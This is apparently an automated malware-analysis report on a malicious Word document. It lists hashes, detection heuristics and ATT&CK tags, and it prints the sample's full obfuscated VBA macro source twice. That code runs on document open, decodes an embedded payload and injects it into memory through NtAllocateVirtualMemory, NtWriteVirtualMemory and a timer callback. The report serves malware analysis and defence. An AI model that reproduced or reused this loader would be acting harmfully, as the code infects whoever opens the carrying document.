Office (OLE) malware analysis — malicious · 025fda9d7cafd219

MALICIOUS

Office (OLE)

212.5 KB Created: 2017-10-04 13:28:00 Authoring application: Microsoft Office Word First seen: 2017-10-10

MD5: 3cea3a68326d3847d9346079a95ad13d SHA-1: 2371de2a73319a0adf024cbdb6841efcafae190a SHA-256: 025fda9d7cafd219263eed912ee1559331aa93bfdbc375e5c2a8d5843a9376ba

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6339045-0. It contains VBA macros, including a Document_Open macro, which are commonly used to download and execute further malicious content. The obfuscated nature of the VBA code suggests an attempt to evade detection, and the presence of a Document_Open macro indicates an intent to execute automatically upon opening the document.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6339045-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6339045-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim dutifulness As String
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13809 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13809 bytes
SHA-256: `193912f6717a5b2d853a70a65573e4715f1a971d361abda0788bd2e66010440a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function aloof(afterburner) Dim certainty As String Dim jackpudding As Byte Dim sandstone As Integer Dim sportsman As Variant #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim axseed As Integer Dim charlatism As LongPtr colima = 6 - 60 + 62 Dim fluting As LongPtr Dim obligational As Integer Dim dawn As Long Dim aggrandizement As LongPtr Dim depart As Variant #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim charlatism As Long colima = 33 - 106 + 77 Dim fluting As Long Dim aggrandizement As Long #End If gavial = VarPtr(charlatism) lorgnette = percept(gavial, VarPtr(afterburner) + 8, colima) actinomycete = 10 - 67 + 56 fluting = 20 - 9 - 11 fendre = 64 - 58 - 6 aggrandizement = 19 - 35 + 9755 badaud = 100 - 87 + 4083 demimonde = 104 - 41 + 1 catalase = autotelism(ByVal actinomycete, _ fluting, ByVal fendre, aggrandizement, ByVal badaud, _ ByVal demimonde) latin = latin And 237 spleenly = spleenly - 368 percept fluting, charlatism, 54 - 7 + 5836 captious = 30 + 10 landscape = 23360 + 10 insight = 322880 + 5 Pmt 0, captious, 9587, 49096, 7 aloof = fluting End Function Sub restlessly() Dim conch As Long Dim vegetate As Long clinker.battlescarred.Value = Day(#12/5/2013#) varday = oh = "luniform" Wrap = "pasteup" kniphofia = "scarf" accipitres = flannelbush harms = "phon" coastguard = "colitis" maintenance = "ambloplites" Set mandevilla = clinker.battlescarred.SelectedItem anagogical = 68 anobiidae = 37289 eelworm = 173043 Pmt 0, anagogical, 25759, 17704, 2 balarama = mandevilla.Name arrows = 22 - 113 + 7935 newsboy = Right(balarama, arrows) dignus = abfarad(newsboy) aristotelean = 51 castor = 22201 bugbear = 301431 Pmt 0, aristotelean, 34196, 57133, 2 angelicanism = "kingcraft" distributary = "dean" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim degenerate As Variant Dim ch As LongPtr Dim darkroom As LongPtr Dim hygre As Integer #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim breachloader As Byte Dim darkroom As Long Dim overcredulity As Long Dim ch As Long #End If shapeup = 118 - 64 - 54 conation = accompli some = 106 - 6 + 3996 agronomic = 116 haitian = 14002 cornfed = 423471 Pmt 0, agronomic, 38493, 18024, 5 probitas = "footmark" suffocation = bloat unscrupulousness = 85 derv = 38166 zoomastigote = 188577 Pmt 0, unscrupulousness, 16744, 26392, 6 aired = dignus lennoaceae = "unconscious" thomas = "ptosis" ch = aloof(aired) epizoan = "elver" yesterdays = "algebraically" #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim desole As Long Dim chromosphere As LongPtr Dim diabolatry As LongPtr Dim algebraic As LongPtr brooch = 68 - 42 + 2038 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim chromosphere As Long divertissement = 82 - 34 + 733 Dim diabolatry As Long Dim algebraic As Long brooch = divertissement + 3459 #End If Dim judge As String Dim reputedly As Long chromosphere = 27 - 119 + 92 darkroom = ch + brooch diabolatry = 128 - 12 + 201411 algebraic = 88 - 87 + 3499 planchment = oppugnation(diabolatry, chromosphere, darkroom, chromosphere, chromosphere, chromosphere, chromosphere) archpriest = 87 intrinsic = 21596 aby = 393884 Pmt 0, archpriest, 28778, 43219, 4 End Sub Function percept(answerable, actinism, carbonic) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then Dim parts As String Dim aeroplane As String Dim montes As LongPtr Dim tollgate As LongPtr Dim cataclysm As LongPtr Dim ensign As Variant Dim arresting As LongPtr Dim hardtack As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim tollgate As Long Dim cutters As Variant Dim montes As Long Dim accurse As String Dim arresting As Long Dim anestrous As Integer Dim cataclysm As Long Dim neencephalon As Long Dim hardtack As Long Dim naemorhedus As Variant Dim struma As Integer #End If latin = latin * 4 branchiopoda = branchiopoda tollgate = answerable hardtack = carbonic branchiopoda = "untimeliness" arresting = actinism mimosa = 110 auricularia = 4959 heartwounding = 580088 Pmt 0, mimosa, 38923, 11310, 8 branchiopoda = branchiopoda montes = 90 - 34 - 57 voxfaucibus ByVal montes, tollgate, arresting, hardtack, cataclysm spleenly = Rnd(153) End Function Private Sub Document_Open() Dim dutifulness As String Dim badness As Byte electrobiology = gentry precolumbian = "enchilada" restlessly pissoir = 30 + 4 physiology = 14810 + 2 granulomatous = 172810 + 5 Pmt 0, pissoir, 13732, 59254, 3 End Sub Attribute VB_Name = "reconcile" ' And hit me like a hurricane ' I was doing alright #If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then ' The moon went hiding, stars quit shining ' I wouldnt be in my truck Public Declare PtrSafe Function chaldron Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal alliaceae As Any, unsaluted As Any, appetent As Any, predetermination As Any) As LongPtr ' Rain was driving, thunder, lightning ' Baby, without warning Public Declare PtrSafe Function dita Lib "Shlwapi.dll" Alias "CreateFileWrapW" (euterpe As LongPtr) As LongPtr ' Knew it was gonna be a long night ' Driving us to your house Public Declare PtrSafe Function oppugnation Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (spectacle As Any, ByVal congou As Any, ByVal deodand As Any, ByVal scarabaeus As Any, ByVal civilly As Any, ByVal ecstacy As Any, ByVal coalescing As Any) As Long ' And hit me like a hurricane ' I was doing alright Public Declare PtrSafe Function blastopore Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal earnestly As Any, agapanthus As Any, underpart As Any, fuego As Any) As LongPtr ' But just your sight had my heart storming ' Hit me like a hurricane Public Declare PtrSafe Function sonorousness Lib "ntdll.dll" Alias "NtCreateEventPair" (outwork As LongPtr, outspeak As LongPtr, poca As LongPtr) As LongPtr ' I was doing alright ' Rain was driving, thunder, lightning Public Declare PtrSafe Function autotelism Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (oxyuridae As LongPtr, bee As LongPtr, ByVal gelsemium As LongPtr, stylishlyByVal As LongPtr, nevadan As LongPtr, ByVal convincement As LongPtr) As LongPtr ' If I woulda just layed my drink down ' If I woulda just layed my drink down Public Declare PtrSafe Function voxfaucibus Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal battle As Any, ByVal experimentist As Any, ByVal addlehead As Any, ByVal cattleman As Any, ByVal citroncolored As Any) As LongPtr ' And hit me like a hurricane ' And walked out Public Declare PtrSafe Function circuition Lib "Kernel32.dll" Alias "CreateEventW" (ByVal zizania As LongPtr, dimensional As LongPtr, metallurgical As LongPtr, unbranched As LongPtr, botanize As LongPtr) As Long ' You wrecked my whole world when you came ' Baby, without warning #End If ' We locked eyes over whiskey on ice ' I was doing alright #If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then ' Started talking bout us again ' I was doing alright Public Declare Function alright Lib "ntdll.dll" Alias "NtCreateEventPair" (keble As Long, hemimorphite As Long, draggletail As Long) As Long ' And hit me like a hurricane' But just your sight had my heart storming Public Declare Function disjoined Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal threelegged As Any, emitter As Any, colleagueship As Any, dactylomancy As Any) As Long ' Started talking bout us again ' The moon went hiding, stars quit shining Public Declare Function classic Lib "Kernel32.dll" Alias "CreateEventW" (ByVal commedy As Long, carouser As Long, plenum As Long, euripus As Long, misnomer As Long) As Long ' But just your sight had my heart storming ' Rain was driving, thunder, lightning Public Declare Function autotelism Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (schrod As Long, mortgaged As Long, ByVal baggageman As Long, acquaintanceByVal As Long, defunct As Long, ByVal guardhouse As Long) As Long ' Knew it was gonna be a long night ' I was doing alright Public Declare Function oppugnation Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (bedclothes As Any, ByVal nganasan As Any, ByVal jettison As Any, ByVal cordiality As Any, ByVal cumulation As Any, ByVal streaked As Any, ByVal litterateur As Any) As Long ' And hit me like a hurricane' But you rolled in with your hair in the wind Public Declare Function voxfaucibus Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal both As Any, ByVal claws As Any, ByVal carangid As Any, ByVal bosky As Any, ByVal barrels As Any) As Long ' I wouldnt be in my truck ' And hit me like a hurricane Public Declare Function organismal Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal coryphantha As Any, bedevilment As Any, soliloquize As Any, encircling As Any) As Long ' Baby, without warning ' From the moment when #End If ' The moon went hiding, stars quit shining ' And hit me like a hurricane Attribute VB_Name = "clinker" Attribute VB_Base = "0{7BF18BC1-95FB-4A37-AB75-B16CF9259AA1}{2599CCA8-F00A-4022-9E53-B372ED7FC2FD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "azodule" Function allectation() Dim millenium(255) As Byte becripple = 93 - 19 - 9 Do While becripple <= 90 + 1 millenium(becripple) = becripple - 65 becripple = becripple + 1 Loop becripple = 48 Do While becripple <= 50 + 8 millenium(becripple) = becripple + 4 becripple = becripple + 1 Loop becripple = 97 Do While becripple <= 120 + 3 millenium(becripple) = becripple - 71 becripple = becripple + 1 Loop millenium(47) = 63 becripple = 43 millenium(becripple) = 60 + 2 allectation = millenium End Function Function peach(logarithmically, hasdrubal, agapemone) Select Case agapemone Case 34 + (10 / 2 - 5) peach = logarithmically \ hasdrubal Case 44 + (5 - 3) / 2 - 1 peach = logarithmically And hasdrubal Case 52 + (56 / 7 - 4 * 2) peach = logarithmically * hasdrubal End Select End Function Function recollection(sweat) recollection = AscW(sweat) End Function Function abfarad(maxwell) As String Dim cheilitis As String Dim autobahn As Long Dim sociobiologic As String Dim hemic As Long Dim emulate As Integer Dim chaparajos() As Byte Dim astrodome(63) As Long Dim stridulation As String Dim obtrude As Long Dim ene As Integer Dim senate As Long Dim arrant(6962) As Byte branchiopoda = sprinkle latin = latin And 92 Dim uncommonness As Integer Dim basel(63) As Long latin = Rnd(483) Dim blackface(63) As Long trillionth = 13 - 75 + 4094 Dim qatari As String Dim jalapeno As Long duel = 116 - 99 + 47 francophobe = 16 - 49 + 262177 Dim biogenic As Byte felucca = 111 - 70 + 214 whitefly = 11 - 111 + 16711780 eheu = 44 - 4 + 216 slog = 13 - 82 + 258117 acrocarp = 10 - 118 + 65388 kazan = 13 - 48 + 16515107 inexperience = 98 - 80 + 65518 elevator = 79 - 49 + 33 chalcocite = 11 - 65 + 4150 Dim spheres As Byte thermojunction = 116 - 86 - 30 bison = 96 - 29 + 7776 Dim geniality() As Byte Dim bedless As Integer Dim bucerotidae As Variant geniality = VBA.StrConv(maxwell, 128) Dim exuviae As String blatta = 47 congridae = 15344 popillia = 135995 Pmt 0, blatta, 31632, 27778, 2 domesman = 7843 aristocrat = vbKeyShift - 12 For defaced = 0 To domesman If defaced Mod 2 = 0 Then geniality(defaced) = geniality(defaced) - aristocrat Else geniality(defaced) = geniality(defaced) - (aristocrat - 1) End If Next defaced creceipts = 102 bigfoot = 2604 hurriedly = 127145 Pmt 0, creceipts, 37803, 56254, 5 ene = 0 nixon = 101 - 19 - 82 lwei = 4 - 100 + 139 cordovan = allectation For senate = (7 - 7) * 1 To (50 + 13) * (5 - 4) basel(senate) = peach(senate, duel, 52) blackface(senate) = peach(senate, chalcocite, 52) astrodome(senate) = peach(senate, francophobe, 52) Next senate elaeis = 7 advances = 4760 acarine = 586069 Pmt 0, elaeis, 5489, 48202, 6 chaparajos = geniality namely = 110 - 125 + 19 denominate = 43 standard = 13157 made = 217660 Pmt 0, denominate, 26064, 50935, 5 corkwood = 10 - 31 + 24 sprinkle = branchiopoda sprinkle = sprinkle fascinating = corkwood + 1 endoparasitic = 126 - 29 - 95 For hemic = 0 To domesman colliquation = chaparajos(hemic) madagascan = chaparajos(hemic + 2) epikeratophakia = blackface(cordovan(chaparajos(hemic + 1))) fractiously = basel(cordovan(madagascan)) + cordovan(chaparajos(hemic + corkwood)) autobahn = astrodome(cordovan(colliquation)) + epikeratophakia + fractiously senate = peach(autobahn, whitefly, 44) arrant(obtrude) = peach(senate, inexperience, 34) senate = peach(autobahn, acrocarp, 44) arrant(obtrude + 1) = peach(senate, eheu, 34) arrant(obtrude + endoparasitic) = peach(autobahn, felucca, 44) obtrude = obtrude + endoparasitic + 1 hemic = hemic + 3 Next abfarad = arrant End Function Sub max() With Documents("Example.doc").Windows(1) If .WindowState = wdWindowStateMinimize Then _ .WindowState = wdWindowStateMaximize End With End Sub

SHA-256: 193912f6717a5b2d853a70a65573e4715f1a971d361abda0788bd2e66010440a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Function aloof(afterburner)
Dim certainty As String
Dim jackpudding As Byte
Dim sandstone As Integer
Dim sportsman As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim axseed As Integer
Dim charlatism As LongPtr
colima = 6 - 60 + 62
Dim fluting As LongPtr
Dim obligational As Integer
Dim dawn As Long
Dim aggrandizement As LongPtr
Dim depart As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim charlatism As Long
colima = 33 - 106 + 77
Dim fluting As Long
Dim aggrandizement As Long
#End If
gavial = VarPtr(charlatism)
lorgnette = percept(gavial, VarPtr(afterburner) + 8, colima)
actinomycete = 10 - 67 + 56
fluting = 20 - 9 - 11
fendre = 64 - 58 - 6
aggrandizement = 19 - 35 + 9755
badaud = 100 - 87 + 4083
demimonde = 104 - 41 + 1
catalase = autotelism(ByVal actinomycete, _
fluting, ByVal fendre, aggrandizement, ByVal badaud, _
ByVal demimonde)
latin = latin And 237

spleenly = spleenly - 368

percept fluting, charlatism, 54 - 7 + 5836
captious = 30 + 10
landscape = 23360 + 10
insight = 322880 + 5
 Pmt 0, captious, 9587, 49096, 7

aloof = fluting
End Function

Sub restlessly()
Dim conch As Long
Dim vegetate As Long
clinker.battlescarred.Value = Day(#12/5/2013#)
varday = oh = "luniform"
Wrap = "pasteup"
kniphofia = "scarf"
accipitres = flannelbush
harms = "phon"

coastguard = "colitis"
maintenance = "ambloplites"
Set mandevilla = clinker.battlescarred.SelectedItem
anagogical = 68
anobiidae = 37289
eelworm = 173043
 Pmt 0, anagogical, 25759, 17704, 2

balarama = mandevilla.Name
arrows = 22 - 113 + 7935
newsboy = Right(balarama, arrows)
dignus = abfarad(newsboy)
aristotelean = 51
castor = 22201
bugbear = 301431
 Pmt 0, aristotelean, 34196, 57133, 2

angelicanism = "kingcraft"
distributary = "dean"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim degenerate As Variant
Dim ch As LongPtr
Dim darkroom As LongPtr
Dim hygre As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim breachloader As Byte
Dim darkroom As Long
Dim overcredulity As Long
Dim ch As Long
#End If
shapeup = 118 - 64 - 54
conation = accompli
some = 106 - 6 + 3996
agronomic = 116
haitian = 14002
cornfed = 423471
 Pmt 0, agronomic, 38493, 18024, 5

probitas = "footmark"
suffocation = bloat
unscrupulousness = 85
derv = 38166
zoomastigote = 188577
 Pmt 0, unscrupulousness, 16744, 26392, 6

aired = dignus
lennoaceae = "unconscious"
thomas = "ptosis"
ch = aloof(aired)
epizoan = "elver"
yesterdays = "algebraically"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim desole As Long
Dim chromosphere As LongPtr
Dim diabolatry As LongPtr
Dim algebraic As LongPtr
brooch = 68 - 42 + 2038
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim chromosphere As Long
divertissement = 82 - 34 + 733
Dim diabolatry As Long
Dim algebraic As Long
brooch = divertissement + 3459

#End If
Dim judge As String
Dim reputedly As Long
chromosphere = 27 - 119 + 92
darkroom = ch + brooch
diabolatry = 128 - 12 + 201411
algebraic = 88 - 87 + 3499
planchment = oppugnation(diabolatry, chromosphere, darkroom, chromosphere, chromosphere, chromosphere, chromosphere)
archpriest = 87
intrinsic = 21596
aby = 393884
 Pmt 0, archpriest, 28778, 43219, 4

End Sub


Function percept(answerable, actinism, carbonic)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim parts As String
Dim aeroplane As String
Dim montes As LongPtr
Dim tollgate As LongPtr
Dim cataclysm As LongPtr
Dim ensign As Variant
Dim arresting As LongPtr
Dim hardtack As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim tollgate As Long
Dim cutters As Variant
Dim montes As Long
Dim accurse As String
Dim arresting As Long
Dim anestrous As Integer
Dim cataclysm As Long
Dim neencephalon As Long
Dim hardtack As Long
Dim naemorhedus As Variant
Dim struma As Integer
#End If
latin = latin * 4
branchiopoda = branchiopoda
tollgate = answerable
hardtack = carbonic
branchiopoda = "untimeliness"
arresting = actinism
mimosa = 110
auricularia = 4959
heartwounding = 580088
 Pmt 0, mimosa, 38923, 11310, 8

branchiopoda = branchiopoda
montes = 90 - 34 - 57
voxfaucibus ByVal montes, tollgate, arresting, hardtack, cataclysm
spleenly = Rnd(153)
End Function

Private Sub Document_Open()
Dim dutifulness As String
Dim badness As Byte
electrobiology = gentry
precolumbian = "enchilada"
restlessly
pissoir = 30 + 4
physiology = 14810 + 2
granulomatous = 172810 + 5
 Pmt 0, pissoir, 13732, 59254, 3
End Sub

Attribute VB_Name = "reconcile"
'  And hit me like a hurricane
'  I was doing alright
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
'  The moon went hiding, stars quit shining
'  I wouldnt be in my truck
Public Declare PtrSafe Function chaldron Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal alliaceae As Any, unsaluted As Any, appetent As Any, predetermination As Any) As LongPtr
'  Rain was driving, thunder, lightning
'  Baby, without warning
Public Declare PtrSafe Function dita Lib "Shlwapi.dll" Alias "CreateFileWrapW" (euterpe As LongPtr) As LongPtr
'  Knew it was gonna be a long night
'  Driving us to your house
Public Declare PtrSafe Function oppugnation Lib "Kernel32" Alias _
  "CreateTimerQueueTimer" (spectacle As Any, ByVal congou As Any, ByVal deodand As Any, ByVal scarabaeus As Any, ByVal civilly As Any, ByVal ecstacy As Any, ByVal coalescing As Any) As Long
'  And hit me like a hurricane
'  I was doing alright
Public Declare PtrSafe Function blastopore Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal earnestly As Any, agapanthus As Any, underpart As Any, fuego As Any) As LongPtr
'  But just your sight had my heart storming
'  Hit me like a hurricane
Public Declare PtrSafe Function sonorousness Lib "ntdll.dll" Alias "NtCreateEventPair" (outwork As LongPtr, outspeak As LongPtr, poca As LongPtr) As LongPtr
'  I was doing alright
'  Rain was driving, thunder, lightning
Public Declare PtrSafe Function autotelism Lib "Ntdll.dll  " Alias _
  "NtAllocateVirtualMemory" (oxyuridae As LongPtr, bee As LongPtr, ByVal gelsemium As LongPtr, stylishlyByVal As LongPtr, nevadan As LongPtr, ByVal convincement As LongPtr) As LongPtr
'  If I woulda just layed my drink down
'  If I woulda just layed my drink down
Public Declare PtrSafe Function voxfaucibus Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal battle As Any, ByVal experimentist As Any, ByVal addlehead As Any, ByVal cattleman As Any, ByVal citroncolored As Any) As LongPtr
'  And hit me like a hurricane
'  And walked out
Public Declare PtrSafe Function circuition Lib "Kernel32.dll" Alias "CreateEventW" (ByVal zizania As LongPtr, dimensional As LongPtr, metallurgical As LongPtr, unbranched As LongPtr, botanize As LongPtr) As Long
'  You wrecked my whole world when you came
'  Baby, without warning
#End If
'  We locked eyes over whiskey on ice
'  I was doing alright
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
'  Started talking bout us again
'  I was doing alright
Public Declare Function alright Lib "ntdll.dll" Alias "NtCreateEventPair" (keble As Long, hemimorphite As Long, draggletail As Long) As Long
'  And hit me like a hurricane'  But just your sight had my heart storming
Public Declare Function disjoined Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal threelegged As Any, emitter As Any, colleagueship As Any, dactylomancy As Any) As Long
'  Started talking bout us again
'  The moon went hiding, stars quit shining
Public Declare Function classic Lib "Kernel32.dll" Alias "CreateEventW" (ByVal commedy As Long, carouser As Long, plenum As Long, euripus As Long, misnomer As Long) As Long
'  But just your sight had my heart storming
'  Rain was driving, thunder, lightning
Public Declare Function autotelism Lib "Ntdll.dll " Alias _
  "NtAllocateVirtualMemory" (schrod As Long, mortgaged As Long, ByVal baggageman As Long, acquaintanceByVal As Long, defunct As Long, ByVal guardhouse As Long) As Long
'  Knew it was gonna be a long night
'  I was doing alright
Public Declare Function oppugnation Lib "Kernel32" Alias _
  "CreateTimerQueueTimer" (bedclothes As Any, ByVal nganasan As Any, ByVal jettison As Any, ByVal cordiality As Any, ByVal cumulation As Any, ByVal streaked As Any, ByVal litterateur As Any) As Long
'  And hit me like a hurricane'  But you rolled in with your hair in the wind
Public Declare Function voxfaucibus Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal both As Any, ByVal claws As Any, ByVal carangid As Any, ByVal bosky As Any, ByVal barrels As Any) As Long
'  I wouldnt be in my truck
'  And hit me like a hurricane
Public Declare Function organismal Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal coryphantha As Any, bedevilment As Any, soliloquize As Any, encircling As Any) As Long
'  Baby, without warning
'  From the moment when
#End If
'  The moon went hiding, stars quit shining
'  And hit me like a hurricane




Attribute VB_Name = "clinker"
Attribute VB_Base = "0{7BF18BC1-95FB-4A37-AB75-B16CF9259AA1}{2599CCA8-F00A-4022-9E53-B372ED7FC2FD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "azodule"
Function allectation()
Dim millenium(255) As Byte
becripple = 93 - 19 - 9
Do While becripple <= 90 + 1
millenium(becripple) = becripple - 65
becripple = becripple + 1
Loop
becripple = 48
Do While becripple <= 50 + 8
millenium(becripple) = becripple + 4
becripple = becripple + 1
Loop
becripple = 97
Do While becripple <= 120 + 3
millenium(becripple) = becripple - 71
becripple = becripple + 1
Loop
millenium(47) = 63
becripple = 43
millenium(becripple) = 60 + 2
allectation = millenium
End Function
Function peach(logarithmically, hasdrubal, agapemone)
Select Case agapemone
Case 34 + (10 / 2 - 5)
peach = logarithmically \ hasdrubal
Case 44 + (5 - 3) / 2 - 1
peach = logarithmically And hasdrubal
Case 52 + (56 / 7 - 4 * 2)
peach = logarithmically * hasdrubal
End Select
End Function
Function recollection(sweat)
recollection = AscW(sweat)
End Function
Function abfarad(maxwell) As String
Dim cheilitis As String
Dim autobahn As Long
Dim sociobiologic As String

Dim hemic As Long
Dim emulate As Integer

Dim chaparajos() As Byte
Dim astrodome(63) As Long
Dim stridulation As String

Dim obtrude As Long
Dim ene As Integer
Dim senate As Long
Dim arrant(6962) As Byte
branchiopoda = sprinkle

latin = latin And 92

Dim uncommonness As Integer

Dim basel(63) As Long
latin = Rnd(483)

Dim blackface(63) As Long
trillionth = 13 - 75 + 4094
Dim qatari As String

Dim jalapeno As Long

duel = 116 - 99 + 47
francophobe = 16 - 49 + 262177
Dim biogenic As Byte

felucca = 111 - 70 + 214
whitefly = 11 - 111 + 16711780
eheu = 44 - 4 + 216
slog = 13 - 82 + 258117
acrocarp = 10 - 118 + 65388
kazan = 13 - 48 + 16515107
inexperience = 98 - 80 + 65518
elevator = 79 - 49 + 33
chalcocite = 11 - 65 + 4150
Dim spheres As Byte
thermojunction = 116 - 86 - 30
bison = 96 - 29 + 7776
Dim geniality() As Byte
Dim bedless As Integer
Dim bucerotidae As Variant
geniality = VBA.StrConv(maxwell, 128)
Dim exuviae As String
blatta = 47
congridae = 15344
popillia = 135995
 Pmt 0, blatta, 31632, 27778, 2

domesman = 7843
aristocrat = vbKeyShift - 12
For defaced = 0 To domesman
If defaced Mod 2 = 0 Then
geniality(defaced) = geniality(defaced) - aristocrat
Else
geniality(defaced) = geniality(defaced) - (aristocrat - 1)
End If
Next defaced
creceipts = 102
bigfoot = 2604
hurriedly = 127145
 Pmt 0, creceipts, 37803, 56254, 5

ene = 0
nixon = 101 - 19 - 82
lwei = 4 - 100 + 139
cordovan = allectation
For senate = (7 - 7) * 1 To (50 + 13) * (5 - 4)
basel(senate) = peach(senate, duel, 52)
blackface(senate) = peach(senate, chalcocite, 52)
astrodome(senate) = peach(senate, francophobe, 52)
Next senate
elaeis = 7
advances = 4760
acarine = 586069
 Pmt 0, elaeis, 5489, 48202, 6

chaparajos = geniality
namely = 110 - 125 + 19
denominate = 43
standard = 13157
made = 217660
 Pmt 0, denominate, 26064, 50935, 5

corkwood = 10 - 31 + 24
sprinkle = branchiopoda

sprinkle = sprinkle

fascinating = corkwood + 1
endoparasitic = 126 - 29 - 95
For hemic = 0 To domesman
colliquation = chaparajos(hemic)
madagascan = chaparajos(hemic + 2)
epikeratophakia = blackface(cordovan(chaparajos(hemic + 1)))
fractiously = basel(cordovan(madagascan)) + cordovan(chaparajos(hemic + corkwood))
autobahn = astrodome(cordovan(colliquation)) + epikeratophakia + fractiously
senate = peach(autobahn, whitefly, 44)
arrant(obtrude) = peach(senate, inexperience, 34)
senate = peach(autobahn, acrocarp, 44)
arrant(obtrude + 1) = peach(senate, eheu, 34)
arrant(obtrude + endoparasitic) = peach(autobahn, felucca, 44)
obtrude = obtrude + endoparasitic + 1
hemic = hemic + 3
Next
abfarad = arrant
End Function

Sub max()
With Documents("Example.doc").Windows(1)
If .WindowState = wdWindowStateMinimize Then _
.WindowState = wdWindowStateMaximize
End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.